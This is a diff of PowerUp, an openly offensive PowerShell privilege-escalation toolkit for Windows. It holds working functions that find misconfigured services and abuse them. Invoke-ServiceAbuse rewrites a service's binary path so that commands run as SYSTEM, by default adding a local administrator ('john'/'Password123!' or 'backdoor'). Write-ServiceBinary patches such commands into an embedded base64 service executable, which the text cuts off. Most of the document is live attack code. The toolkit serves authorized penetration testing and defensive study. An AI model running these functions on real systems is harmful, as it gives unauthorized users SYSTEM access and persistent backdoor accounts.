+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl + +.DESCRIPTION + +Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds +a service Dacl to the service object with Add-ServiceDacl. All group SIDs for the current +user are enumerated services where the user has some type of permission are filtered. The +services are then filtered against a specified set of permissions, and services where the +current user have the specified permissions are returned. + +.PARAMETER Name + +An array of one or more service names to test against the specified permission set. + +.PARAMETER Permissions + +A manual set of permission to test again. One of:'QueryConfig', 'ChangeConfig', 'QueryStatus', +'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl', +'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', +'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess' + +.PARAMETER PermissionSet + +A pre-defined permission set to test a specified service against. 'ChangeConfig', 'Restart', or 'AllAccess'. + +.EXAMPLE + +Get-Service | Test-ServiceDaclPermission + +Return all service objects where the current user can modify the service configuration. + +.EXAMPLE + +Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart' + +Return all service objects that the current user can restart. + +.EXAMPLE + +Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC' + +Return the VulnSVC object if the current user has start permissions. + +.OUTPUTS + +ServiceProcess.ServiceController + +.LINK + +https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('ServiceProcess.ServiceController')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ServiceName', 'Service')] + [String[]] + [ValidateNotNullOrEmpty()] + $Name, + + [String[]] + [ValidateSet('QueryConfig', 'ChangeConfig', 'QueryStatus', 'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', 'UserDefinedControl', 'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', 'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess')] + $Permissions, + + [String] + [ValidateSet('ChangeConfig', 'Restart', 'AllAccess')] + $PermissionSet = 'ChangeConfig' + ) + + BEGIN { $AccessMask = @{ 'QueryConfig' = [uint32]'0x00000001' 'ChangeConfig' = [uint32]'0x00000002' @@ -1354,18 +1951,18 @@ function Test-ServiceDaclPermission { $CheckAllPermissionsInSet = $False - if($PSBoundParameters['Permissions']) { + if ($PSBoundParameters['Permissions']) { $TargetPermissions = $Permissions } else { - if($PermissionSet -eq 'ChangeConfig') { + if ($PermissionSet -eq 'ChangeConfig') { $TargetPermissions = @('ChangeConfig', 'WriteDac', 'WriteOwner', 'GenericAll', ' GenericWrite', 'AllAccess') } - elseif($PermissionSet -eq 'Restart') { + elseif ($PermissionSet -eq 'Restart') { $TargetPermissions = @('Start', 'Stop') $CheckAllPermissionsInSet = $True # so we check all permissions && style } - elseif($PermissionSet -eq 'AllAccess') { + elseif ($PermissionSet -eq 'AllAccess') { $TargetPermissions = @('GenericAll', 'AllAccess') } } @@ -1377,7 +1974,7 @@ function Test-ServiceDaclPermission { $TargetService = $IndividualService | Add-ServiceDacl - if($TargetService -and $TargetService.Dacl) { + if ($TargetService -and $TargetService.Dacl) { # enumerate all group SIDs the current user is a part of $UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() @@ -1385,9 +1982,9 @@ function Test-ServiceDaclPermission { $CurrentUserSids += $UserIdentity.User.Value ForEach($ServiceDacl in $TargetService.Dacl) { - if($CurrentUserSids -contains $ServiceDacl.SecurityIdentifier) { + if ($CurrentUserSids -contains $ServiceDacl.SecurityIdentifier) { - if($CheckAllPermissionsInSet) { + if ($CheckAllPermissionsInSet) { $AllMatched = $True ForEach($TargetPermission in $TargetPermissions) { # check permissions && style @@ -1397,7 +1994,7 @@ function Test-ServiceDaclPermission { break } } - if($AllMatched) { + if ($AllMatched) { $TargetService } } @@ -1428,50 +2025,70 @@ function Test-ServiceDaclPermission { # ######################################################## -function Get-ServiceUnquoted { +function Get-UnquotedService { <# - .SYNOPSIS +.SYNOPSIS + +Returns the name and binary path for services with unquoted paths +that also have a space in the name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission + +.DESCRIPTION + +Uses Get-WmiObject to query all win32_service objects and extract out +the binary pathname for each. Then checks if any binary paths have a space +and aren't quoted. + +.EXAMPLE - Returns the name and binary path for services with unquoted paths - that also have a space in the name. +Get-UnquotedService - .EXAMPLE +Get a set of potentially exploitable services. - PS C:\> $services = Get-ServiceUnquoted +.OUTPUTS - Get a set of potentially exploitable services. +PowerUp.UnquotedService - .LINK +.LINK - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb +https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb #> - [CmdletBinding()] param() + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.UnquotedService')] + [CmdletBinding()] + Param() # find all paths to service .exe's that have a space in the path and aren't quoted - $VulnServices = Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne '')} | Where-Object { (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'"))} | Where-Object {($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4)) -match ".* .*"} + $VulnServices = Get-WmiObject -Class win32_service | Where-Object { + $_ -and ($Null -ne $_.pathname) -and ($_.pathname.Trim() -ne '') -and (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'")) -and ($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf('.exe') + 4)) -match '.* .*' + } if ($VulnServices) { ForEach ($Service in $VulnServices) { - $ModifiableFiles = $Service.pathname.split(' ') | Get-ModifiablePath + $SplitPathArray = $Service.pathname.Split(' ') + $ConcatPathArray = @() + for ($i=0;$i -lt $SplitPathArray.Count; $i++) { + $ConcatPathArray += $SplitPathArray[0..$i] -join ' ' + } - $ModifiableFiles | Where-Object {$_ -and $_.ModifiablePath -and ($_.ModifiablePath -ne '')} | Foreach-Object { - $ServiceRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $Service.name - - if($ServiceRestart) { - $CanRestart = $True - } - else { - $CanRestart = $False - } + $ModifiableFiles = $ConcatPathArray | Get-ModifiablePath + $ModifiableFiles | Where-Object {$_ -and $_.ModifiablePath -and ($_.ModifiablePath -ne '')} | Foreach-Object { + $CanRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $Service.name $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ServiceName' $Service.name $Out | Add-Member Noteproperty 'Path' $Service.pathname $Out | Add-Member Noteproperty 'ModifiablePath' $_ $Out | Add-Member Noteproperty 'StartName' $Service.startname $Out | Add-Member Noteproperty 'AbuseFunction' "Write-ServiceBinary -Name '$($Service.name)' -Path " - $Out | Add-Member Noteproperty 'CanRestart' $CanRestart + $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart) + $Out | Add-Member Aliasproperty Name ServiceName + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UnquotedService') $Out } } @@ -1481,25 +2098,37 @@ function Get-ServiceUnquoted { function Get-ModifiableServiceFile { <# - .SYNOPSIS +.SYNOPSIS - Enumerates all services and returns vulnerable service files. +Enumerates all services and returns vulnerable service files. - .DESCRIPTION +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath - Enumerates all services by querying the WMI win32_service class. For each service, - it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine - if the current user has rights to modify the service binary itself or any associated - arguments. If the associated binary (or any configuration files) can be overwritten, - privileges may be able to be escalated. +.DESCRIPTION + +Enumerates all services by querying the WMI win32_service class. For each service, +it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine +if the current user has rights to modify the service binary itself or any associated +arguments. If the associated binary (or any configuration files) can be overwritten, +privileges may be able to be escalated. + +.EXAMPLE - .EXAMPLE +Get-ModifiableServiceFile - PS C:\> Get-ModifiableServiceFile +Get a set of potentially exploitable service binares/config files. - Get a set of potentially exploitable service binares/config files. +.OUTPUTS + +PowerUp.ModifiablePath #> - [CmdletBinding()] param() + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.ModifiableServiceFile')] + [CmdletBinding()] + Param() Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pathname} | ForEach-Object { @@ -1508,16 +2137,7 @@ function Get-ModifiableServiceFile { $ServiceStartName = $_.startname $ServicePath | Get-ModifiablePath | ForEach-Object { - - $ServiceRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $ServiceName - - if($ServiceRestart) { - $CanRestart = $True - } - else { - $CanRestart = $False - } - + $CanRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $ServiceName $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ServiceName' $ServiceName $Out | Add-Member Noteproperty 'Path' $ServicePath @@ -1526,7 +2146,9 @@ function Get-ModifiableServiceFile { $Out | Add-Member Noteproperty 'ModifiableFileIdentityReference' $_.IdentityReference $Out | Add-Member Noteproperty 'StartName' $ServiceStartName $Out | Add-Member Noteproperty 'AbuseFunction' "Install-ServiceBinary -Name '$ServiceName'" - $Out | Add-Member Noteproperty 'CanRestart' $CanRestart + $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart) + $Out | Add-Member Aliasproperty Name ServiceName + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableServiceFile') $Out } } @@ -1535,42 +2157,46 @@ function Get-ModifiableServiceFile { function Get-ModifiableService { <# - .SYNOPSIS +.SYNOPSIS - Enumerates all services and returns services for which the current user can modify the binPath. +Enumerates all services and returns services for which the current user can modify the binPath. - .DESCRIPTION +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail - Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if - the current user has rights to change the service configuration. +.DESCRIPTION - .EXAMPLE +Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if +the current user has rights to change the service configuration. - PS C:\> Get-ModifiableService +.EXAMPLE - Get a set of potentially exploitable services. -#> - [CmdletBinding()] param() +Get-ModifiableService - Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeConfig' | ForEach-Object { +Get a set of potentially exploitable services. - $ServiceDetails = $_ | Get-ServiceDetail +.OUTPUTS - $ServiceRestart = $_ | Test-ServiceDaclPermission -PermissionSet 'Restart' +PowerUp.ModifiablePath +#> - if($ServiceRestart) { - $CanRestart = $True - } - else { - $CanRestart = $False - } + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.ModifiableService')] + [CmdletBinding()] + Param() + Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeConfig' | ForEach-Object { + $ServiceDetails = $_ | Get-ServiceDetail + $CanRestart = $_ | Test-ServiceDaclPermission -PermissionSet 'Restart' $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.name $Out | Add-Member Noteproperty 'Path' $ServiceDetails.pathname $Out | Add-Member Noteproperty 'StartName' $ServiceDetails.startname $Out | Add-Member Noteproperty 'AbuseFunction' "Invoke-ServiceAbuse -Name '$($ServiceDetails.name)'" - $Out | Add-Member Noteproperty 'CanRestart' $CanRestart + $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart) + $Out | Add-Member Aliasproperty Name ServiceName + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableService') $Out } } @@ -1578,37 +2204,47 @@ function Get-ModifiableService { function Get-ServiceDetail { <# - .SYNOPSIS +.SYNOPSIS - Returns detailed information about a specified service by querying the - WMI win32_service class for the specified service name. +Returns detailed information about a specified service by querying the +WMI win32_service class for the specified service name. - .DESCRIPTION +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on - the pipeline object returned by Get-Service, extracts out the service name, queries the - WMI win32_service class for the specified service for details like binPath, and outputs - everything. +.DESCRIPTION - .PARAMETER Name +Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on +the pipeline object returned by Get-Service, extracts out the service name, queries the +WMI win32_service class for the specified service for details like binPath, and outputs +everything. - An array of one or more service names to query information for. +.PARAMETER Name - .EXAMPLE +An array of one or more service names to query information for. - PS C:\> Get-ServiceDetail -Name VulnSVC +.EXAMPLE + +Get-ServiceDetail -Name VulnSVC + +Gets detailed information about the 'VulnSVC' service. - Gets detailed information about the 'VulnSVC' service. +.EXAMPLE + +Get-Service VulnSVC | Get-ServiceDetail - .EXAMPLE +Gets detailed information about the 'VulnSVC' service. - PS C:\> Get-Service VulnSVC | Get-ServiceDetail +.OUTPUTS - Gets detailed information about the 'VulnSVC' service. +System.Management.ManagementObject #> - param ( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [OutputType('PowerUp.ModifiableService')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('ServiceName')] [String[]] [ValidateNotNullOrEmpty()] @@ -1616,18 +2252,16 @@ function Get-ServiceDetail { ) PROCESS { - ForEach($IndividualService in $Name) { - - $TargetService = Get-Service -Name $IndividualService - - Get-WmiObject -Class win32_service -Filter "Name='$($TargetService.Name)'" | Where-Object {$_} | ForEach-Object { - try { - $_ - } - catch{ - Write-Verbose "Error: $_" - $null + $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop + if ($TargetService) { + Get-WmiObject -Class win32_service -Filter "Name='$($TargetService.Name)'" | Where-Object {$_} | ForEach-Object { + try { + $_ + } + catch { + Write-Verbose "Error: $_" + } } } } @@ -1643,107 +2277,121 @@ function Get-ServiceDetail { function Invoke-ServiceAbuse { <# - .SYNOPSIS +.SYNOPSIS - Abuses a function the current user has configuration rights on in order - to add a local administrator or execute a custom command. +Abuses a function the current user has configuration rights on in order +to add a local administrator or execute a custom command. - Author: @harmj0y - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath - .DESCRIPTION +.DESCRIPTION - Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current - user has configuration modification rights on and executes a series of automated actions to - execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the - original service binary path and configuration state are preserved. Then the service is stopped - and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a - series of commands, the service is started, stopped, and the next command is configured. After - completion, the original service configuration is restored and a custom object is returned - that captures the service abused and commands run. +Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current +user has configuration modification rights on and executes a series of automated actions to +execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the +original service binary path and configuration state are preserved. Then the service is stopped +and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a +series of commands, the service is started, stopped, and the next command is configured. After +completion, the original service configuration is restored and a custom object is returned +that captures the service abused and commands run. - .PARAMETER Name +.PARAMETER Name - An array of one or more service names to abuse. +An array of one or more service names to abuse. - .PARAMETER UserName +.PARAMETER UserName - The [domain\]username to add. If not given, it defaults to "john". - Domain users are not created, only added to the specified localgroup. +The [domain\]username to add. If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. - .PARAMETER Password +.PARAMETER Password - The password to set for the added user. If not given, it defaults to "Password123!" +The password to set for the added user. If not given, it defaults to "Password123!" - .PARAMETER LocalGroup +.PARAMETER LocalGroup - Local group name to add the user to (default of 'Administrators'). +Local group name to add the user to (default of 'Administrators'). - .PARAMETER Credential +.PARAMETER Credential - A [Management.Automation.PSCredential] object specifying the user/password to add. +A [Management.Automation.PSCredential] object specifying the user/password to add. - .PARAMETER Command +.PARAMETER Command - Custom command to execute instead of user creation. +Custom command to execute instead of user creation. - .PARAMETER Force +.PARAMETER Force - Switch. Force service stopping, even if other services are dependent. +Switch. Force service stopping, even if other services are dependent. - .EXAMPLE +.EXAMPLE - PS C:\> Invoke-ServiceAbuse -Name VulnSVC +Invoke-ServiceAbuse -Name VulnSVC - Abuses service 'VulnSVC' to add a localuser "john" with password - "Password123! to the machine and local administrator group +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! to the machine and local administrator group - .EXAMPLE +.EXAMPLE - PS C:\> Get-Service VulnSVC | Invoke-ServiceAbuse +Get-Service VulnSVC | Invoke-ServiceAbuse - Abuses service 'VulnSVC' to add a localuser "john" with password - "Password123! to the machine and local administrator group +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! to the machine and local administrator group - .EXAMPLE +.EXAMPLE - PS C:\> Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john" +Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john" - Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the - local adminisrtators group. +Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the +local adminisrtators group. - .EXAMPLE +.EXAMPLE - PS C:\> Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users" +Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users" - Abuses service 'VulnSVC' to add a localuser "backdoor" with password - "password" to the machine and local "Power Users" group +Abuses service 'VulnSVC' to add a localuser "backdoor" with password +"password" to the machine and local "Power Users" group - .EXAMPLE +.EXAMPLE + +Invoke-ServiceAbuse -Name VulnSVC -Command "net ..." + +Abuses service 'VulnSVC' to execute a custom command. - PS C:\> Invoke-ServiceAbuse -Name VulnSVC -Command "net ..." +.OUTPUTS - Abuses service 'VulnSVC' to execute a custom command. +PowerUp.AbusedService #> - param ( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerUp.AbusedService')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('ServiceName')] [String[]] [ValidateNotNullOrEmpty()] $Name, + [ValidateNotNullOrEmpty()] [String] $UserName = 'john', + [ValidateNotNullOrEmpty()] [String] $Password = 'Password123!', + [ValidateNotNullOrEmpty()] [String] $LocalGroup = 'Administrators', [Management.Automation.PSCredential] - $Credential, + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, [String] [ValidateNotNullOrEmpty()] @@ -1755,12 +2403,12 @@ function Invoke-ServiceAbuse { BEGIN { - if($PSBoundParameters['Command']) { + if ($PSBoundParameters['Command']) { $ServiceCommands = @($Command) } else { - if($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Credential']) { $UserNameToAdd = $Credential.UserName $PasswordToAdd = $Credential.GetNetworkCredential().Password } @@ -1769,7 +2417,7 @@ function Invoke-ServiceAbuse { $PasswordToAdd = $Password } - if($UserNameToAdd.Contains('\')) { + if ($UserNameToAdd.Contains('\')) { # only adding a domain user to the local group, no user creation $ServiceCommands = @("net localgroup $LocalGroup $UserNameToAdd /add") } @@ -1784,8 +2432,7 @@ function Invoke-ServiceAbuse { ForEach($IndividualService in $Name) { - $TargetService = Get-Service -Name $IndividualService - + $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop $ServiceDetails = $TargetService | Get-ServiceDetail $RestoreDisabled = $False @@ -1803,7 +2450,7 @@ function Invoke-ServiceAbuse { ForEach($ServiceCommand in $ServiceCommands) { - if($PSBoundParameters['Force']) { + if ($PSBoundParameters['Force']) { $TargetService | Stop-Service -Force -ErrorAction Stop } else { @@ -1811,18 +2458,17 @@ function Invoke-ServiceAbuse { } Write-Verbose "Executing command '$ServiceCommand'" - - $Success = $TargetService | Set-ServiceBinPath -binPath "$ServiceCommand" + $Success = $TargetService | Set-ServiceBinaryPath -Path "$ServiceCommand" if (-not $Success) { - throw "Error reconfiguring the binPath for $($TargetService.Name)" + throw "Error reconfiguring the binary path for $($TargetService.Name)" } $TargetService | Start-Service -ErrorAction SilentlyContinue Start-Sleep -Seconds 2 } - if($PSBoundParameters['Force']) { + if ($PSBoundParameters['Force']) { $TargetService | Stop-Service -Force -ErrorAction Stop } else { @@ -1831,24 +2477,24 @@ function Invoke-ServiceAbuse { Write-Verbose "Restoring original path to service '$($TargetService.Name)'" Start-Sleep -Seconds 1 - $Success = $TargetService | Set-ServiceBinPath -binPath "$OriginalServicePath" + $Success = $TargetService | Set-ServiceBinaryPath -Path "$OriginalServicePath" if (-not $Success) { throw "Error restoring the original binPath for $($TargetService.Name)" } # try to restore the service to whatever the service's original state was - if($RestoreDisabled) { + if ($RestoreDisabled) { Write-Verbose "Re-disabling service '$($TargetService.Name)'" $TargetService | Set-Service -StartupType Disabled -ErrorAction Stop } - elseif($OriginalServiceState -eq "Paused") { + elseif ($OriginalServiceState -eq "Paused") { Write-Verbose "Starting and then pausing service '$($TargetService.Name)'" $TargetService | Start-Service Start-Sleep -Seconds 1 $TargetService | Set-Service -Status Paused -ErrorAction Stop } - elseif($OriginalServiceState -eq "Stopped") { + elseif ($OriginalServiceState -eq "Stopped") { Write-Verbose "Leaving service '$($TargetService.Name)' in stopped state" } else { @@ -1859,6 +2505,7 @@ function Invoke-ServiceAbuse { $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ServiceAbused' $TargetService.Name $Out | Add-Member Noteproperty 'Command' $($ServiceCommands -join ' && ') + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.AbusedService') $Out } } @@ -1867,91 +2514,101 @@ function Invoke-ServiceAbuse { function Write-ServiceBinary { <# - .SYNOPSIS +.SYNOPSIS - Patches in the specified command to a pre-compiled C# service executable and - writes the binary out to the specified ServicePath location. +Patches in the specified command to a pre-compiled C# service executable and +writes the binary out to the specified ServicePath location. - Author: @harmj0y - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .DESCRIPTION +.DESCRIPTION - Takes a pre-compiled C# service binary and patches in the appropriate commands needed - for service abuse. If a -UserName/-Password or -Credential is specified, the command - patched in creates a local user and adds them to the specified -LocalGroup, otherwise - the specified -Command is patched in. The binary is then written out to the specified - -ServicePath. Either -Name must be specified for the service, or a proper object from - Get-Service must be passed on the pipeline in order to patch in the appropriate service - name the binary will be running under. +Takes a pre-compiled C# service binary and patches in the appropriate commands needed +for service abuse. If a -UserName/-Password or -Credential is specified, the command +patched in creates a local user and adds them to the specified -LocalGroup, otherwise +the specified -Command is patched in. The binary is then written out to the specified +-ServicePath. Either -Name must be specified for the service, or a proper object from +Get-Service must be passed on the pipeline in order to patch in the appropriate service +name the binary will be running under. - .PARAMETER Name +.PARAMETER Name - The service name the EXE will be running under. +The service name the EXE will be running under. - .PARAMETER UserName +.PARAMETER UserName - The [domain\]username to add. If not given, it defaults to "john". - Domain users are not created, only added to the specified localgroup. +The [domain\]username to add. If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. - .PARAMETER Password +.PARAMETER Password - The password to set for the added user. If not given, it defaults to "Password123!" +The password to set for the added user. If not given, it defaults to "Password123!" - .PARAMETER LocalGroup +.PARAMETER LocalGroup - Local group name to add the user to (default of 'Administrators'). +Local group name to add the user to (default of 'Administrators'). - .PARAMETER Credential +.PARAMETER Credential - A [Management.Automation.PSCredential] object specifying the user/password to add. +A [Management.Automation.PSCredential] object specifying the user/password to add. - .PARAMETER Command +.PARAMETER Command - Custom command to execute instead of user creation. +Custom command to execute instead of user creation. - .PARAMETER Path +.PARAMETER Path - Path to write the binary out to, defaults to 'service.exe' in the local directory. +Path to write the binary out to, defaults to 'service.exe' in the local directory. - .EXAMPLE +.EXAMPLE - PS C:\> Write-ServiceBinary -Name VulnSVC +Write-ServiceBinary -Name VulnSVC - Writes a service binary to service.exe in the local directory for VulnSVC that - adds a local Administrator (john/Password123!). +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). - .EXAMPLE +.EXAMPLE - PS C:\> Get-Service VulnSVC | Write-ServiceBinary +Get-Service VulnSVC | Write-ServiceBinary - Writes a service binary to service.exe in the local directory for VulnSVC that - adds a local Administrator (john/Password123!). +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). - .EXAMPLE +.EXAMPLE - PS C:\> Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' - Writes a service binary to service.exe in the local directory for VulnSVC that adds - TESTLAB\john to the Administrators local group. +Writes a service binary to service.exe in the local directory for VulnSVC that adds +TESTLAB\john to the Administrators local group. - .EXAMPLE +.EXAMPLE - PS C:\> Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! - Writes a service binary to service.exe in the local directory for VulnSVC that - adds a local Administrator (backdoor/Password123!). +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (backdoor/Password123!). - .EXAMPLE +.EXAMPLE + +Write-ServiceBinary -Name VulnSVC -Command "net ..." - PS C:\> Write-ServiceBinary -Name VulnSVC -Command "net ..." +Writes a service binary to service.exe in the local directory for VulnSVC that +executes a custom command. - Writes a service binary to service.exe in the local directory for VulnSVC that - executes a custom command. +.OUTPUTS + +PowerUp.ServiceBinary #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerUp.ServiceBinary')] + [CmdletBinding()] Param( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('ServiceName')] [String] [ValidateNotNullOrEmpty()] @@ -1967,7 +2624,8 @@ function Write-ServiceBinary { $LocalGroup = 'Administrators', [Management.Automation.PSCredential] - $Credential, + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, [String] [ValidateNotNullOrEmpty()] @@ -1982,11 +2640,11 @@ function Write-ServiceBinary { $B64Binary = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANM1P1UAAAAAAAAAAOAAAgELAQsAAEwAAAAIAAAAAAAAHmoAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMhpAABTAAAAAIAAADAFAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAABQaQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAJEoAAAAgAAAATAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAADAFAAAAgAAAAAYAAABOAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAAVAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAagAAAAAAAEgAAAACAAUA+CAAAFhIAAADAAAABgAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHoDLBMCewEAAAQsCwJ7AQAABG8RAAAKAgMoEgAACipyAnMTAAAKfQEAAAQCcgEAAHBvFAAACigVAAAKKjYCKBYAAAoCKAIAAAYqAAATMAIAKAAAAAEAABFyRwAAcApyQEAAcAZvFAAACigXAAAKJiDQBwAAKBgAAAoWKBkAAAoqBioAABMwAwAYAAAAAgAAEReNAQAAAQsHFnMDAAAGogcKBigaAAAKKkJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAMQCAAAjfgAAMAMAAHADAAAjU3RyaW5ncwAAAACgBgAAUEAAACNVUwDwRgAAEAAAACNHVUlEAAAAAEcAAFgBAAAjQmxvYgAAAAAAAAACAAABVxUCAAkAAAAA+iUzABYAAAEAAAAaAAAAAwAAAAEAAAAGAAAAAgAAABoAAAAOAAAAAgAAAAEAAAADAAAAAAAKAAEAAAAAAAYARQAvAAoAYQBaAA4AfgBoAAoA6wDZAAoAAgHZAAoAHwHZAAoAPgHZAAoAVwHZAAoAcAHZAAoAiwHZAAoApgHZAAoA3gG/AQoA8gG/AQoAAALZAAoAGQLZAAoAUAI2AgoAfAJpAkcAkAIAAAoAvwKfAgoA3wK